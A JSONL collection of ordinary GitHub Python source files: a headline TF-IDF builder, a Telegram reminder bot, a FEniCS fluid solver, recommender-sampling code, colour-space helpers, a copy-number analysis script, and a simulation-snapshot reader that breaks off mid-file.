+{"seq_id":"16193278535","text":"#import packages\nimport numpy as np\nimport random\nfrom collections import Counter\nimport os\nimport pandas as pd\nfrom pathlib import Path\nimport random\nimport pandas as pd\nfrom pathlib import Path\n\n# Sets up variables\nword_list = []\nindex_keep = {}\nresults = set()\nkey={'nyt_headlines.csv':-1,'foxnews_headlines.csv':2,'washingtonpost_headlines.csv':-1,'csmonitor_headlines.csv':0,'nypost_headlines.csv':1,'cnn_headlines.csv':-2}\n\n#initializing path names\n# main directory\ndir = Path(__file__).parents[1]\n\n# get path to raw_data folder\ndata = str(dir) + \"/data/data_collection/raw_data\"\n\n# get path to tdms folder\ntdm_path= str(dir) + \"/data/data_collection/processed_data/term_matrices\"\n\ndef join(X):\n tf_idf=[]\n # print(\"test join()\")\n c=0\n for matrix in X:\n # print(\"changed matrix\")\n c+=1\n for row in matrix:\n # print(\"-------------------\")\n # print(len(row))\n tf_idf.append(row)\n # print(len(tf_idf))\n # print(\"end\")\n # print(f\"c={c}\")\n return tf_idf\n\ndef count(title, query):\n c = 0\n for word in title:\n if (str(query).lower().strip() in str(word).lower().strip()):\n c = c + 1\n return c\n\ndef raw_data_compress(num_samples):\n results=set()\n # reads raw_data files\n for filename in os.listdir(data):\n file_path = data+\"/\"+filename\n data_rows = pd.read_csv(file_path, on_bad_lines='skip')\n # filtering data for number of samples wanted wanted\n # handling if the number of samples wanted is more than the file contains.\n # saving \n if num_samples<=len(data_rows):\n index_keep[filename] = random.sample(range(len(data_rows)),num_samples)\n else:\n index_keep[filename] = range(len(data_rows))\n \n data_compressed = data_rows.iloc[index_keep[filename], 1]\n # data_compressed = data_compressed.iloc[:, 1]\n for row in data_compressed:\n results.update(str(row).lower().split(\"\\n\")[0].strip().split(\" \"))\n return results\n\n#generating the term document matrix\ndef term_matrix(samples=100, test_headline: str=None):\n term_document_matrices=[]\n y=[]\n results=raw_data_compress(samples)\n results = list(results)\n # print(os.listdir(data)) \n for filename in os.listdir(data):\n file_path = \"/\".join([data,filename])\n data_rows=pd.read_csv(file_path, on_bad_lines='skip')\n rows_compressed = data_rows.iloc[index_keep[filename],:]\n rows_compressed = rows_compressed.iloc[:, 1]\n \n term_document_matrix = []\n for title in rows_compressed:\n title = str(title).strip().split(\" \")\n for t in title:\n t=t.strip()\n array = np.zeros(len(results))\n for word in set(title):\n idf=np.log(len(rows_compressed)/count(rows_compressed,word))\n array[results.index(str(word).lower().strip())] = idf*count(title, str(word).lower()) / len(title)\n \n # print(len(array))\n term_document_matrix.append(array)\n # print(type(list(term_document_matrix))) \n term_document_matrices.append(term_document_matrix)\n y.append(list([key[filename]]*len(rows_compressed)))\n # print(type(term_document_matrices))\n # print(join(term_document_matrices))\n # print(np.array(join(term_document_matrices)).shape)\n # print(len(term_document_matrices))\n return np.array(join(term_document_matrices)),np.array(np.ravel(y))\n\nif __name__==\"__main__\":\n term_matrix()","repo_name":"heliosraz/NewsHeadlinePolitics","sub_path":"src/term_doc.py","file_name":"term_doc.py","file_ext":"py","file_size_in_byte":3562,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"7486829917","text":"from aiogram import types\nfrom aiogram.dispatcher import FSMContext\nimport keyboard as kb\nfrom create_bot import bot\nimport asyncio\nfrom database import sqlite_db as sql\nfrom rbot_handlers.states import FSMAdmin\n\n\nasync def command_start(message):\n try:\n await bot.send_message(message.from_user.id, f\"Рад тебя видеть, {message.from_user.first_name}!\",\n reply_markup=kb.keyboard)\n await message.delete()\n except:\n await message.reply(r\"Чтобы общаться с ботом, напиши ему в ЛС https://t.me/oh_my_reminder_bot\")\n\n\nasync def command_create(message):\n await FSMAdmin.text.set()\n await message.answer(\"О чем напомнить?\")\n\n\nasync def set_text(message: types.Message, state: FSMContext):\n async with state.proxy() as data:\n data['text'] = message.text\n await FSMAdmin.next()\n await message.answer('Когда напомнить? (время в формате HH:MM)')\n\n\nasync def set_date(message: types.Message, state: FSMContext):\n async with state.proxy() as data:\n data['date'] = message.text\n await sql.add_reminder(\n dict(user_id=message.from_user.id,\n text=data['text'],\n time=data['date']))\n # await message.answer()\n await state.finish()\n\n\nasync def check_tasks():\n for task in await sql.select_reminder():\n await bot.send_message(task[\"user_id\"], task['time'])\n await sql.delete_reminder(task[\"id\"])\n\n\ndef repeat_check_tasks(loop):\n asyncio.ensure_future(check_tasks(), loop=loop)\n loop.call_later(2, repeat_check_tasks, loop)\n\n\nasync def cancel(message: types.Message, state: FSMContext):\n current_state = await state.get_state()\n if current_state is None:\n return\n await state.finish()\n await message.answer('Добавление записи отменено')\n\n\n","repo_name":"ProYulia/reminder_bot_v2.0","sub_path":"rbot_handlers/client.py","file_name":"client.py","file_ext":"py","file_size_in_byte":1921,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"8021050379","text":"from fenics import (\n Function,\n FunctionSpace,\n project,\n DirichletBC,\n Constant,\n TrialFunction,\n split,\n TestFunction,\n solve,\n assemble,\n Expression,\n assign,\n action,\n derivative,\n NonlinearVariationalProblem,\n NonlinearVariationalSolver,\n info,\n det,\n inv,\n dot,\n)\nfrom spaces import Space\nfrom parameters import Parameters\nfrom time_structure import MacroTimeStep\nfrom initial import Initial\nfrom forms import deformation_gradient, sigma_fluid\n\n# Define a function solving a problem on a subdomain\ndef solve_fluid(\n velocity_fluid: Initial,\n displacement_fluid: Initial,\n pressure_fluid: Initial,\n velocity_solid: Initial,\n displacement_solid: Initial,\n fluid: Space,\n solid: Space,\n first_time_step,\n param: Parameters,\n macrotimestep_fluid: MacroTimeStep,\n macrotimestep_solid: MacroTimeStep,\n adjoint,\n save=False,\n):\n\n # Store old solutions\n velocity_fluid_old = Function(fluid.function_space_split[0])\n displacement_fluid_old = Function(fluid.function_space_split[1])\n pressure_fluid_old = Function(fluid.function_space_split[2])\n velocity_fluid_old.assign(velocity_fluid.old)\n displacement_fluid_old.assign(displacement_fluid.old)\n pressure_fluid_old.assign(pressure_fluid.old)\n\n # Store old interface values\n velocity_old_interface = Function(solid.function_space_split[0])\n displacement_old_interface = Function(solid.function_space_split[1])\n velocity_old_interface.assign(velocity_solid.old_average)\n displacement_old_interface.assign(displacement_solid.old_average)\n\n # Initialize new interface values\n velocity_interface = Function(solid.function_space_split[0])\n displacement_interface = Function(solid.function_space_split[1])\n\n # Define time pointers\n if adjoint:\n\n microtimestep = macrotimestep_fluid.tail.before\n\n else:\n\n microtimestep = macrotimestep_fluid.head\n\n # Compute macro time-step size\n size = macrotimestep_fluid.size - 1\n for m in range(size):\n\n # Initialize average values\n velocity_fluid_average_temp = Function(fluid.function_space_split[0])\n displacement_fluid_average_temp = Function(\n fluid.function_space_split[1]\n )\n pressure_fluid_average_temp = Function(fluid.function_space_split[2])\n velocity_fluid_average = Function(fluid.function_space_split[0])\n displacement_fluid_average = Function(fluid.function_space_split[1])\n pressure_fluid_average = Function(fluid.function_space_split[2])\n\n # Extrapolate weak boundary conditions on the interface\n if adjoint:\n\n extrapolation_proportion = (\n microtimestep.point - macrotimestep_fluid.head.point\n ) / macrotimestep_fluid.dt\n time_step_size = microtimestep.dt\n microtimestep_form = microtimestep.after\n microtimestep_form_before = microtimestep\n if m == 0 and macrotimestep_fluid.after is None:\n time_step_size_old = microtimestep.dt\n microtimestep_form_after = microtimestep_form\n elif m == 0:\n time_step_size_old = (\n macrotimestep_fluid.microtimestep_after.before.dt\n )\n microtimestep_form_after = (\n macrotimestep_fluid.microtimestep_after\n )\n else:\n time_step_size_old = microtimestep.after.dt\n microtimestep_form_after = microtimestep_form.after\n\n else:\n\n extrapolation_proportion = (\n macrotimestep_fluid.tail.point - microtimestep.after.point\n ) / macrotimestep_fluid.dt\n time_step_size = microtimestep.dt\n time_step_size_old = microtimestep.dt\n microtimestep_form_before = None\n microtimestep_form = None\n microtimestep_form_after = None\n\n # Define intermediate solutions\n velocity_interface.assign(\n project(\n extrapolation_proportion * velocity_solid.old\n + (1.0 - extrapolation_proportion) * velocity_solid.new,\n solid.function_space_split[0],\n )\n )\n displacement_interface.assign(\n project(\n extrapolation_proportion * displacement_solid.old\n + (1.0 - extrapolation_proportion) * displacement_solid.new,\n solid.function_space_split[1],\n )\n )\n\n # Define trial and test functions\n trial_function = TrialFunction(fluid.function_space)\n (\n velocity_fluid_new,\n displacement_fluid_new,\n pressure_fluid_new,\n ) = split(trial_function)\n test_function = TestFunction(fluid.function_space)\n (\n first_test_function,\n second_test_function,\n third_test_function,\n ) = split(test_function)\n\n # Define scheme\n time = microtimestep.after.point\n time_before = microtimestep.point\n initial = False\n if not adjoint:\n bilinear_form = fluid.primal_problem.bilinear_form\n functional = fluid.primal_problem.functional\n else:\n bilinear_form = fluid.adjoint_problem.bilinear_form\n functional = fluid.adjoint_problem.functional\n if first_time_step and m == 0:\n initial = True\n left_hand_side = bilinear_form(\n velocity_fluid_new,\n displacement_fluid_new,\n pressure_fluid_new,\n first_test_function,\n second_test_function,\n third_test_function,\n velocity_fluid_old,\n displacement_fluid_old,\n pressure_fluid_old,\n fluid,\n param,\n time_step_size,\n microtimestep_form_before,\n microtimestep_form,\n )\n right_hand_side = functional(\n velocity_fluid_old,\n displacement_fluid_old,\n pressure_fluid_old,\n velocity_interface,\n displacement_interface,\n velocity_old_interface,\n displacement_old_interface,\n first_test_function,\n second_test_function,\n third_test_function,\n fluid,\n solid,\n param,\n time,\n time_before,\n time_step_size,\n time_step_size_old,\n microtimestep_form_before,\n microtimestep_form,\n microtimestep_form_after,\n initial,\n )\n right_hand_side_assemble = assemble(right_hand_side)\n\n # Solve problem\n time = microtimestep.after.point\n if adjoint:\n left_hand_side_assemble = assemble(left_hand_side)\n trial_function = Function(fluid.function_space)\n [\n boundary.apply(\n left_hand_side_assemble, right_hand_side_assemble\n )\n for boundary in fluid.boundaries(time, param, adjoint)\n ]\n solve(\n left_hand_side_assemble,\n trial_function.vector(),\n right_hand_side_assemble,\n )\n (\n velocity_fluid_new,\n displacement_fluid_new,\n pressure_fluid_new,\n ) = trial_function.split(trial_function)\n else:\n trial_function_new = Function(fluid.function_space)\n form = left_hand_side - right_hand_side\n form = action(form, trial_function_new)\n jacobian = derivative(form, trial_function_new, trial_function)\n boundaries = fluid.boundaries(time, param, adjoint)\n problem = NonlinearVariationalProblem(\n form, trial_function_new, boundaries, jacobian\n )\n solver = NonlinearVariationalSolver(problem)\n # prm = solver.parameters\n # info(prm, True)\n solver.parameters[\"newton_solver\"][\"report\"] = False\n # solver.parameters[\"newton_solver\"][\"maximum_iterations\"] = 100\n solver.solve()\n (\n velocity_fluid_new,\n displacement_fluid_new,\n pressure_fluid_new,\n ) = trial_function_new.split(trial_function)\n\n # Save solutions\n if save:\n velocity_fluid.save(velocity_fluid_new)\n displacement_fluid.save(displacement_fluid_new)\n pressure_fluid.save(pressure_fluid_new)\n\n # Update average values\n velocity_fluid_average_temp.assign(velocity_fluid_average)\n displacement_fluid_average_temp.assign(displacement_fluid_average)\n pressure_fluid_average_temp.assign(pressure_fluid_average)\n # velocity_fluid_average.assign(project(velocity_fluid_average_temp\n # + 0.5 * time_step_size / macrotimestep_fluid.dt\n # * (velocity_fluid_old + velocity_fluid_new),\n # fluid.function_space_split[0]))\n # displacement_fluid_average.assign(project(displacement_fluid_average_temp\n # + 0.5 * time_step_size / macrotimestep_fluid.dt\n # * (displacement_fluid_old + displacement_fluid_new),\n # fluid.function_space_split[1]))\n # pressure_fluid_average.assign(project(pressure_fluid_average_temp + time_step_size / macrotimestep_fluid.dt * pressure_fluid_new,\n # fluid.function_space_split[2]))\n velocity_fluid_average.assign(velocity_fluid_new)\n displacement_fluid_average.assign(displacement_fluid_new)\n pressure_fluid_average.assign(pressure_fluid_new)\n\n # Update solution\n velocity_fluid_old.assign(velocity_fluid_new)\n displacement_fluid_old.assign(displacement_fluid_new)\n pressure_fluid_old.assign(pressure_fluid_new)\n\n # Update boundary conditions\n velocity_old_interface.assign(velocity_interface)\n displacement_old_interface.assign(displacement_interface)\n\n # Advance timeline\n if adjoint:\n\n microtimestep = microtimestep.before\n\n else:\n\n microtimestep = microtimestep.after\n\n # Save final values\n # velocity_fluid_average.assign(velocity_fluid_new)\n # displacement_fluid_average.assign(displacement_fluid_new)\n # pressure_fluid_average.assign(pressure_fluid_new)\n\n velocity_fluid.new.assign(velocity_fluid_new)\n displacement_fluid.new.assign(displacement_fluid_new)\n pressure_fluid.new.assign(pressure_fluid_new)\n velocity_fluid.new_average.assign(velocity_fluid_average)\n displacement_fluid.new_average.assign(displacement_fluid_average)\n pressure_fluid.new_average.assign(pressure_fluid_average)\n\n return\n","repo_name":"MSoszynska/FSI","sub_path":"solve_fluid.py","file_name":"solve_fluid.py","file_ext":"py","file_size_in_byte":11042,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"2458671159","text":"# set the environment path to find Recommenders\nimport sys\n\nimport numpy as np\nimport pandas as pd\nfrom sklearn.preprocessing import minmax_scale\nfrom sklearn.model_selection import train_test_split\n\nfrom reco_utils.common.python_utils import binarize\nfrom reco_utils.common.timer import Timer\nfrom reco_utils.dataset import movielens\nfrom reco_utils.dataset.python_splitters import python_stratified_split\nfrom reco_utils.evaluation.python_evaluation import (\n map_at_k,\n ndcg_at_k,\n precision_at_k,\n recall_at_k,\n rmse,\n mae,\n logloss,\n rsquared,\n exp_var\n)\nfrom reco_utils.recommender.sar import SAR\nimport os\nfrom tqdm import tqdm\nimport argparse\n\nfrom util_sample import split_by_user, train_model, sampling, predict, save_aggregation, save_test, load_data_after_split, save_data_after_split\nfrom util_sample import preprocess_args\n\n\nif __name__ == '__main__':\n parser = argparse.ArgumentParser()\n parser.add_argument('--dataset',default='100k')\n parser.add_argument('--s',type=int,default=300)\n parser.add_argument('--N_prime',type=int,default=1)\n parser.add_argument('--T',type=int,default=100000)\n parser.add_argument('--Alg',type=str,default='ir')\n parser.add_argument('--series',type=int,default=1)\n args = preprocess_args(parser.parse_args())\n\n # Select MovieLens data size: 100k, 1m, 10m, or 20m\n MOVIELENS_DATA_SIZE = args.dataset\n\n data = movielens.load_pandas_df(\n size=MOVIELENS_DATA_SIZE\n )\n\n # Convert the float precision to 32-bit in order to reduce memory consumption\n data['rating'] = data['rating'].astype(np.float32)\n\n s = args.s\n k = args.k\n T = args.T\n series = args.series\n\n user_num = 0\n item_num = 0\n\n if MOVIELENS_DATA_SIZE == '1m':\n user_num = 6040\n item_num = 3952\n elif MOVIELENS_DATA_SIZE == '100k':\n user_num = 943\n item_num = 1682\n else:\n raise ValueError\n\n data_after_split = split_by_user(data, \"userID\", user_num, args.Alg)\n print(\"Complete splitting the dataset. \")\n\n frequency_aggregation = [{} for i in range(user_num)]\n\n for i in tqdm(range(T)):\n # randomly sample s users and get the train set and test set\n train_set, test_set = sampling(data_after_split, user_num, s)\n model = train_model(args.Alg, train_set)\n top_k = predict(model, test_set, train_set, k, args.Alg, user_num)\n\n # store the recommended items into frequency_aggregation\n for j in range(len(top_k)):\n # remember user position = user id - 1\n current_user = top_k['userID'][j]\n current_item = top_k['itemID'][j]\n if current_item in frequency_aggregation[current_user - 1]:\n frequency_aggregation[current_user - 1][current_item] += 1\n else:\n frequency_aggregation[current_user - 1][current_item] = 1\n\n test = data_after_split[0]['test']\n for i in tqdm(range(1, user_num)):\n test = test.append(data_after_split[i]['test'], ignore_index=True)\n\n directory = './data/' + args.dataset\n if not os.path.exists(directory):\n os.makedirs(directory)\n directory += '/' + MOVIELENS_DATA_SIZE + '_' + str(s) + '_' + str(k) + '_' + str(T) + '_' + args.Alg + '_' + 'default'\n if not os.path.exists(directory):\n os.makedirs(directory)\n\n test_name = directory + '/test_' + str(series) + '.csv'\n save_test(test, test_name)\n\n aggregation_name = directory + '/frequency_aggregation_' + str(series) + '.txt'\n save_aggregation(frequency_aggregation, aggregation_name)\n\n print('Complete')\n","repo_name":"liu00222/PORE-Provably-Robust-Recommender-Systems-against-Data-Poisoning-Attacks","sub_path":"sample_T.py","file_name":"sample_T.py","file_ext":"py","file_size_in_byte":3604,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"21"} +{"seq_id":"10862782696","text":"import numpy\nimport skimage\nfrom PIL import Image\nfrom matplotlib import pyplot\nfrom skimage.color import lab2rgb, rgb2lab\n\n\ndef create_image_by_lab(lightness, a, b) -> Image:\n \"\"\"\n Create a 500x500 RGB image by L*a*b* or CIELAB color space values\n\n :param lightness: L* indicates lightness with 0 as black and 100 as white\n :param a: a* color value where -128 is green and +128 is red\n :param b: b* color value where -128 is blue and +128 is yellow\n :return: RGB Image\n \"\"\"\n lab_array = numpy.zeros((500, 500, 3))\n lab_array[:, :, 0] = lightness\n lab_array[:, :, 1] = a\n lab_array[:, :, 2] = b\n\n rgb_array_float = lab2rgb(lab_array)\n rgb_array_uint8 = skimage.img_as_ubyte(rgb_array_float)\n\n return Image.fromarray(rgb_array_uint8, mode=\"RGB\")\n\n\ndef create_image_by_rgb(red, green, blue) -> Image:\n \"\"\"\n Create a 500x500 RGB image by red, green and blue values\n\n :param red: red value between 0 and 255\n :param green: green value between 0 and 255\n :param blue: blue value between 0 and 255\n :return: RGB Image\n \"\"\"\n rgb_array = numpy.zeros((500, 500, 3), dtype=numpy.uint8)\n rgb_array[:, :, 0] = red\n rgb_array[:, :, 1] = green\n rgb_array[:, :, 2] = blue\n return Image.fromarray(rgb_array, mode=\"RGB\")\n\n\ndef convert_lab_array_to_rgb(array: numpy.ndarray) -> numpy.ndarray:\n rgb_array_float = lab2rgb(array)\n rgb_array_uint8 = skimage.img_as_ubyte(rgb_array_float)\n return rgb_array_uint8\n\n\ndef convert_rgb_array_to_lab(array: numpy.ndarray) -> numpy.ndarray:\n return rgb2lab(array)\n\n\ndef show_image(image, title=None):\n pyplot.imshow(image)\n pyplot.axis(\"off\")\n if title:\n pyplot.title(title)\n pyplot.show()\n","repo_name":"ptrstn/colorspaces","sub_path":"colorspaces/core.py","file_name":"core.py","file_ext":"py","file_size_in_byte":1719,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"30195223581","text":"#!/usr/local/bin/python3\n\nimport pandas as pd\nfrom dataclasses import dataclass\nimport argparse\nimport math\n#from os.path import exists\n\n@dataclass\nclass SequenceRange:\n \"\"\"Class for the start and end of a range.\"\"\"\n name: str\n transcript: str\n start: int\n end: int\n chrom: str\n total_cn: int\n def overlaps(self, other: \"SequenceRange\") -> bool:\n if self.chrom != other.chrom:\n return False\n return (other.start <= self.start <= other.end) or (other.start <= self.end <= other.end) or (self.start <= other.start <= self.end) or (self.start <= other.end <= self.end)\n\nmy_parser = argparse.ArgumentParser(description='find the missing data in cnv files')\nmy_parser.add_argument('-sample',\n type=str,\n help='sample')\nmy_parser.add_argument('-ploidy',\n type=float,\n help='ploidy')\nmy_parser.add_argument('-gene_df',\n type=str,\n help='path to the df of genes and cooridnates of canonical transcript')\nmy_parser.add_argument('-somatic_cnv_vcf',\n type=str,\n help='path to the mtr input cnv of the sample')\n####data input\n\nargs = my_parser.parse_args()\nsample = args.sample\nploidy = args.ploidy\ngene_df_path = args.gene_df\ncnv_path = args.somatic_cnv_vcf\n \n \namps = list()\nmissing_gene_data_sample= list()\nmissing_data_genes_next_to_amps = list()\ngene_df = pd.read_csv(gene_df_path) \n#gene_df=gene_df.dropna()\n\n#set threshold for amplifications\nif ploidy <2.5:\n amp_threshold = 5\nelif ploidy >= 2.5:\n amp_threshold = 9\n\n \n#file_exists = exists(cnv_path):\ntry: \n cnv = pd.read_csv(cnv_path, '\\t')\n cnv['total_cn'] = cnv['major_cn'] + cnv['minor_cn']\n total_cn = list(cnv['total_cn'])\n cnv['id'] = cnv['seqnames'].astype(str) + '_' + cnv['start'].astype(str) + '_' + cnv['end'].astype(str) + '_' + cnv['total_cn'].astype(str) +'_' + sample\n id_list = list(cnv['id'])\n for contig in range(len(total_cn)):\n if total_cn[contig] >= amp_threshold: \n amps.append(id_list[contig]) \n #take the list of amps obtained in for loop above and convert to a table\n if len(amps) >0:\n amps_df = pd.DataFrame(amps)\n amps_df[[ 'chr', 'start', 'end','total_cn', 'sample']] = amps_df[0].str.split('_', 4, expand=True)\n amps_df.drop(columns=[0])\n else:\n amps_df = pd.DataFrame(columns=[0])\n ##for each contig (no matter if it is amplified) report whether any contig overlaps with gene of interest - this is to identify samples with no data for the gene of interest for i in range(len(gene_df.index)): ##need file with all coding gene name chromosome coordinates #for gene in gene_df:\n genes_in_amps = [[] for _ in range(len(amps_df.index))]\n for i in range(len(gene_df.index)): \n gene = SequenceRange(gene_df['gene_name'][i], gene_df['transcript_ID'][i], gene_df['start'][i], gene_df['end'][i], gene_df['chr'][i], 'total_cn_placeholder')\n ##find the genes with missing data\n contig_overlapping_gene = list()\n cnv_chr = cnv.loc[cnv['seqnames'].astype('str') == gene.chrom]\n cnv_chr.index = pd.RangeIndex(len(cnv_chr.index))\n contigs_after_gene = list()\n contigs_before_gene = list()\n for contig in range(len(list(cnv_chr['total_cn']))):\n contig_range= SequenceRange('place_holder', 'place_holder', int(cnv_chr['start'][contig]), int(cnv_chr['end'][contig]), str(cnv_chr['seqnames'][contig]), cnv_chr['total_cn'][contig])\n if contig_range.overlaps(gene):\n contig_overlapping_gene.append(id_list[contig])\n else:\n if contig_range.start > gene.end:\n distance_from_gene = gene.end - contig_range.start\n contig_id = contig_range.chrom + '_' +str(contig_range.start) + '_' +str(contig_range.end) + '_' + str(contig_range.total_cn) + '_' + str(distance_from_gene) + '_' +sample\n contigs_after_gene.append(contig_id)\n elif contig_range.end < gene.start:\n distance_from_gene = gene.start - contig_range.end\n contig_id = contig_range.chrom + '_' +str(contig_range.start) + '_' +str(contig_range.end) + '_' + str(contig_range.total_cn)+ '_'+ str(distance_from_gene) +'_' +sample\n contigs_before_gene.append(contig_id)\n if len(contig_overlapping_gene)== 0:\n missing_gene_data_sample.append(gene.name + '_' + gene.transcript + '_' +str(gene.start) + '_' +str(gene.end) +'_' +gene.chrom + '_' + sample)\n \n ##if there are contigs after the missing gene. Find the closest one and see if it is amplified\n total_cn_of_amp_neighbours = []\n if len(contigs_after_gene) >0:\n contigs_after_gene_df = pd.DataFrame(contigs_after_gene)\n contigs_after_gene_df[[ 'chr', 'start', 'end','total_cn', 'distance_from_gene', 'sample']] = contigs_after_gene_df[0].str.split('_', 5, expand=True)\n contigs_after_gene_df['total_cn'] = contigs_after_gene_df['total_cn'].astype('int') \n contigs_after_gene_df['distance_from_gene'] = contigs_after_gene_df['distance_from_gene'].astype('int') \n\n if contigs_after_gene_df['total_cn'][contigs_after_gene_df['distance_from_gene'].idxmax()] > amp_threshold:\n total_cn_of_amp_neighbours.append(contigs_after_gene_df['total_cn'][contigs_after_gene_df['distance_from_gene'].idxmax()])\n \n if len(contigs_before_gene) >0: \n contigs_before_gene_df = pd.DataFrame(contigs_before_gene)\n contigs_before_gene_df[[ 'chr', 'start', 'end','total_cn', 'distance_from_gene', 'sample']] = contigs_before_gene_df[0].str.split('_', 5, expand=True)\n contigs_before_gene_df['total_cn'] = contigs_before_gene_df['total_cn'].astype('int') \n contigs_before_gene_df['distance_from_gene'] = contigs_before_gene_df['distance_from_gene'].astype('int') \n\n if contigs_before_gene_df['total_cn'][contigs_before_gene_df['distance_from_gene'].idxmin()] > amp_threshold:\n total_cn_of_amp_neighbours.append(contigs_before_gene_df['total_cn'][contigs_before_gene_df['distance_from_gene'].idxmin()])\n\n if len(total_cn_of_amp_neighbours) > 0:\n missing_data_genes_next_to_amps.append(gene.name + '_' + gene.transcript + '_' +str(gene.start) + '_' +str(gene.end) +'_' +gene.chrom + '_' +str(total_cn_of_amp_neighbours) + '_' +sample)\n\n ##report the genes in each amp\n if len(amps) > 0: \n for amp in range(len(amps_df.index)):\n amp_range= SequenceRange('place_holder', 'place_holder', int(amps_df['start'][amp]), int(amps_df['end'][amp]), str(amps_df['chr'][amp]), amps_df['total_cn'][amp])\n if amp_range.overlaps(gene) and amp_range.chrom == gene.chrom:\n genes_in_amps[amp].append(gene.name +'_' + gene.transcript + '_' +str(gene.start) + '_' +str(gene.end) + '_' +gene.chrom + '_' + sample)\n #genes_in_amps[amp].append(gene.name)\n amps_df['genes_in_amps'] = genes_in_amps\n \n #print(sample)\n with open(sample + '_mtr_format_cnv_missing.txt', 'w') as f:\n f.write(sample+' complete')\nexcept FileNotFoundError as e:\n with open(sample + '_mtr_format_cnv_missing.txt', 'w') as f:\n f.write(sample+' no mtr format cnv file')\n \nif len(missing_gene_data_sample) >0:\n missing_data_samples_gene_df = pd.DataFrame(missing_gene_data_sample)\n #missing_data_samples_gene_df = missing_data_samples_mdm2_df.rename(columns={0: 'missing_mdm2_samples'})\n missing_data_samples_gene_df[['gene', 'transcript_ID', 'start', 'end','chr', 'sample']] = missing_data_samples_gene_df[0].str.split('_', 5, expand=True)\n missing_data_samples_gene_df.drop(columns=[0])\nelse:\n missing_data_samples_gene_df = pd.DataFrame(columns=[0])\n \nif len(missing_data_genes_next_to_amps) >0:\n missing_data_genes_next_to_amps_df = pd.DataFrame(missing_data_genes_next_to_amps)\n #missing_data_samples_gene_df = missing_data_samples_mdm2_df.rename(columns={0: 'missing_mdm2_samples'})\n #missing_data_genes_next_to_amps_df[['gene', 'transcript_ID', 'start', 'end','chr', 'sample']] = missing_data_genes_next_to_amps_df[0].str.split('_', 5, expand=True)\n missing_data_genes_next_to_amps_df[['gene', 'transcript_ID', 'start', 'end','chr', 'total_cn_contig_after_contig_before', 'sample']] = missing_data_genes_next_to_amps_df[0].str.split('_', 6, expand=True)\n missing_data_genes_next_to_amps_df.drop(columns=[0])\nelse:\n missing_data_genes_next_to_amps_df = pd.DataFrame(columns=[0])\n\n#output table of genes with missing data \nmissing_data_samples_gene_df.to_csv(sample + '_genes_with_missing_data.csv')\n\n#output table of genes with missing data next to amps \nmissing_data_genes_next_to_amps_df.to_csv(sample + '_genes_with_missing_data_next_to_amps.csv')\n\n#output amps_df\namps_df.to_csv(sample + '_amplifications.csv')\n","repo_name":"Daniella-Black/cnv_drivers","sub_path":"bin/cnv_drivers.py","file_name":"cnv_drivers.py","file_ext":"py","file_size_in_byte":9344,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"6893558577","text":"import numpy as np\nimport h5py \n\ndef read(filename):\n\tfile = h5py.File(filename,'r')\n\thdf5_menu=list(file.keys())\n\tparticle_keys=list(file['PartType0'])\n\tif 'PartType5' in hdf5_menu:\n\t\tsink_keys=list(file['PartType5'])\n\n\tclass a():\n\t\tpass\n\theader=np.array(list(file.get(\"Header\").attrs.values()))\n\ta.boxsize=header[6]\n\tnpart=header[0]\n\ta.npart=npart\n\ta.nparttot=header[1]\n\ta.time=header[4]\n\tprint('boxsize: '+str(a.boxsize))\n\tprint('Npart: '+str(a.npart))\n\tprint('Npart_tot: '+str(a.nparttot))\n\tprint('time in code units: '+str(a.time))\n\n\tN = int(sum(npart)) - npart[4] # type 4 is reserved for TRACER_MC\n\tngas = npart[0]\n\tnsink = npart[5]\n\t\n\ta.nsink=nsink\n\ta.ngas=ngas\n\ta.unit_leng_cm = 1.0e+17\n\ta.unit_mass_g = 1.991e33\n\ta.unit_time_s = 2.7436898e12\n\n\tigot_pot = 0\n\tigot_accel = 0\n\tigot_dt = 0\n\tigot_bmag = 0\n\tigot_chem = 0\n\tigot_soft = 0\n\n\tfor key in particle_keys:\n\t\tdata=np.array(file['PartType0'][key])\n\t\tif key=='Coordinates':\n\t\t\tprint('Reading Coordinates')\n\t\t\ta.x,a.y,a.z=data[:,0],data[:,1],data[:,2]\n\t\tif key=='Velocities':\n\t\t\tprint('Reading Velocities')\n\t\t\ta.vx,a.vy,a.vz=data[:,0],data[:,1],data[:,2]\n\t\tif key=='Acceleration':\n\t\t\tprint('Reading Acceleration')\n\t\t\ta.accelx,a.accely,a.accelz=data[:,0],data[:,1],data[:,2]\n\t\t\tigot_accel = 1\n\t\tif key=='ChemicalAbundances':\n\t\t\tprint('Reading ChemicalAbundances')\n\t\t\ta.chem=data\t\t\t\n\t\tif key=='DednerSpeed':\n\t\t\tprint('Reading DednerSpeed')\n\t\t\ta.dedner=data\n\t\tif key=='Density':\n\t\t\tprint('Reading Density')\n\t\t\ta.rho=data\n\t\tif key=='Gamma':\n\t\t\tprint('Reading Gamma')\n\t\t\ta.gamma=data\n\t\tif key=='InternalEnergy':\n\t\t\tprint('Reading InternalEnergy')\n\t\t\ta.u=data\n\t\tif key=='MagneticField':\n\t\t\tprint('Reading MagneticField')\n\t\t\ta.bx,a.by,a.bz=data[:,0],data[:,1],data[:,2]\n\t\tif key=='MagneticFieldDivergence':\n\t\t\tprint('Reading MagneticFieldDivergence')\n\t\t\ta.divb=data\n\t\tif key=='MagneticFieldDivergenceAlternative':\n\t\t\tprint('Reading MagneticFieldDivergenceAlternative')\n\t\t\ta.divb_alt=data\n\t\tif key=='MagneticFieldPsi':\n\t\t\tprint('Reading MagneticFieldPsi')\n\t\t\tprint('MagneticFieldPsi shape '+str(data.shape))\n\t\t\ta.bpsi=data\n\t\tif key=='Masses':\n\t\t\tprint('Reading Masses')\n\t\t\ta.mass=data\n\t\tif key=='ParticleIDs':\n\t\t\tprint('Reading ParticleIDs')\n\t\t\ta.partid=data\n\t\tif key=='Potential':\n\t\t\tprint('Reading Potential')\n\t\t\ta.potential=data\n\t\t\tigot_pot = 1\n\t\tif key=='PotentialPeak':\n\t\t\tprint('Reading PotentialPeak')\n\t\t\ta.peak=data\n\t\tif key=='VelocityDivergence':\n\t\t\tprint('Reading VelocityDivergence')\n\t\t\ta.divv=data\n\tif (a.nsink 